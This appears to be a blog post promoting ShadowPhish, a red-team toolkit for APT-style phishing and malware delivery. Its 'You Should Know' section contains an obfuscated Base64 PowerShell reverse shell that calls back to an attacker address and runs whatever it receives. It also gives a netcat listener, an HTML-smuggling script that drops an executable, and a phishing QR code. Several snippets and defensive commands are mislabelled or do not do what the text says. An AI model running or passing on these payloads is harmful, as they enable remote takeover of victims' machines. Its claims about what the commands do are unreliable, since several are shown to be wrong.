ShadowPhish - APT Awareness Toolkit

ShadowPhish is a Red Team toolkit designed to simulate advanced social engineering techniques used by APT (Advanced Persistent Threat) groups. Created by Joas A Santos, this tool helps security professionals understand and defend against sophisticated phishing and malware delivery methods.

Features:

✅ Malicious PDF Generator – Creates weaponized PDFs for exploitation.
✅ Word Macro with Remote Shellcode – Embeds malicious macros in Word documents.
✅ PowerShell Obfuscation – Uses Base64, IEX, compression, and variable manipulation.
✅ Remote VBS + Embedded HTTP Server – Executes VBS scripts with a built-in server.
✅ Prebuilt Phishing Websites – Includes `.sites/` directory (compatible with ZPhisher).
✅ Fake Recaptcha (PasteJack Style) – Mimics CAPTCHA to steal credentials.
✅ Deepfake Video (FaceFusion) & DeepVoice TTS – Generates synthetic media for deception.
✅ Payload Generator – Creates payloads for Windows, Linux, and macOS.
✅ Built-in Reverse Shell Listener – Provides command interface for post-exploitation.
✅ APT Chains (APT29, APT41, FIN7) – Simulates known APT attack patterns.
✅ Smishing (SMS) & Vishing (Twilio Calls) – Phone-based social engineering.
✅ Malicious LNK Shortcut Builder – Crafted shortcuts for initial access.
✅ HTML Smuggling Generator – Embeds payloads in Base64 HTML.
✅ Simulated Ransomware + Decryptor – Demonstrates ransomware behavior.
✅ QR Code Phishing Generator – Malicious QR codes for attacks.

🔗 Tool Link: https://lnkd.in/dwRTjx4d
🔗 ZPhisher Sites: https://lnkd.in/dpx7nuFG

You Should Know:

1. Malicious PDF Generation

 Use pdftotext + embedded JavaScript for exploitation
pdftotext -l 1 -f 1 malicious.pdf output.txt

2. PowerShell Obfuscation

 Base64-encoded PowerShell payload
$encoded = "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEALgAxADAAIgAsADQANAA0ADQAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQB9ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="
Invoke-Expression ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($encoded)))

3. Reverse Shell Listener (Netcat)

 Start a listener for incoming shells
nc -lvnp 4444

4. HTML Smuggling Payload

<!-- Embed a malicious payload in HTML -->

<script>
var payload = "BASE64_ENCODED_PAYLOAD";
var blob = new Blob([atob(payload)], {type: "application/octet-stream"});
var url = URL.createObjectURL(blob);
var a = document.createElement("a");
a.href = url;
a.download = "payload.exe";
a.click();
</script>

5. QR Code Phishing

 Generate a QR code linking to a malicious URL
qrencode -o phishing.png "https://evil.com/login"

6. Fake Recaptcha (PasteJacking)

// Fake CAPTCHA to steal clipboard data
document.addEventListener('copy', (e) => {
e.clipboardData.setData('text/plain', 'stolen_data');
e.preventDefault();
});

What Undercode Say:

ShadowPhish is a powerful toolkit for simulating APT attacks, emphasizing the need for robust defensive measures. Key takeaways:
– Monitor PowerShell execution (Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational").
– Detect malicious PDFs with `pdfid.py` (from Didier Stevens).
– Block suspicious LNK files via GPO (DisableShortcutCreation).
– Analyze network traffic for HTML smuggling (tcpdump -i eth0 -w capture.pcap).
– Use YARA rules to detect APT payloads (yara -r apt_rules.yar /malware).
– Enable AMSI for PowerShell protection (Set-MpPreference -DisableRealtimeMonitoring $false).
– Log Twilio API calls if vishing is suspected.